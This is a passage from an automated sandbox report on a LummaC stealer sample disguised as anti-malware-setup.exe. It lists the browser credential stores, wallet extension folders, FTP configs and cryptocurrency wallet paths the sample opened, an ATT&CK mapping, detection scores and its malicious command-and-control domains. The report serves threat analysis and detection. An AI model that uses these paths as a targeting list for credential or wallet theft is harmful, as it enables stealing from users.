              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		311
              Process Injection              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares41
              Data from Local System              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object Model2
              Clipboard Data              		114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets22
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              anti-malware-setup.exe72%VirustotalBrowse
              anti-malware-setup.exe71%ReversingLabsWin32.Spyware.Lummastealer

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.steamp0%Avira URL Cloudsafe
              https://sputnik-1985.com/v100%Avira URL Cloudmalware
              https://sputnik-1985.com/api100%Avira URL Cloudmalware
              https://sputnik-1985.com/~100%Avira URL Cloudmalware
              https://community.fastly.steamstatic.com~T0%Avira URL Cloudsafe
              https://store.steampower0%Avira URL Cloudsafe
              https://store.st1T0%Avira URL Cloudsafe
              https://sputnik-1985.com/100%Avira URL Cloudmalware
              enterwahsh.biz100%Avira URL Cloudmalware
              https://login.sbZ0%Avira URL Cloudsafe
              https://checkout.steampownZ0%Avira URL Cloudsafe
              https://sputnik-1985.com/apiate100%Avira URL Cloudmalware
              https://sketchfab.0Z0%Avira URL Cloudsafe
              https://help.st~Z0%Avira URL Cloudsafe
              https://api.steAT0%Avira URL Cloudsafe
              https://sputnik-1985.com:443/api100%Avira URL Cloudmalware
              https://cdn.fastly.steamFT0%Avira URL Cloudsafe
              https://sputnik-1985.com/U70100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		104.102.49.254
              		truefalse
                		high
                sputnik-1985.com
                		104.21.48.1
                		truefalse
                  		high
                  53.210.109.20.in-addr.arpa
                  		unknown
                  		unknowntrue
                    		unknown
                    wordyfindy.lat
                    		unknown
                    		unknownfalse
                      		high
                      slipperyloo.lat
                      		unknown
                      		unknownfalse
                        		high
                        curverpluch.lat
                        		unknown
                        		unknownfalse
                          		high
                          tentabatte.lat
                          		unknown
                          		unknownfalse
                            		high
                            manyrestro.lat
                            		unknown
                            		unknownfalse
                              		high
                              bashfulacid.lat
                              		unknown
                              		unknownfalse
                                		high
                                198.187.3.20.in-addr.arpa
                                		unknown
                                		unknownfalse
                                  		high
                                  shapestickyr.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    enterwahsh.biz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      talkynicer.lat
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        slipperyloo.latfalse
                                          		high
                                          https://sputnik-1985.com/apitrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            enterwahsh.biztrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            curverpluch.latfalse
                                              		high
                                              tentabatte.latfalse
                                                		high
                                                manyrestro.latfalse
                                                  		high
                                                  bashfulacid.latfalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://player.vimeo.comBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.steampBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.fastly.BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://sputnik-1985.com/~BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.youtube.comBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://sputnik-1985.com/vBitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://store.st1TBitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.comBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
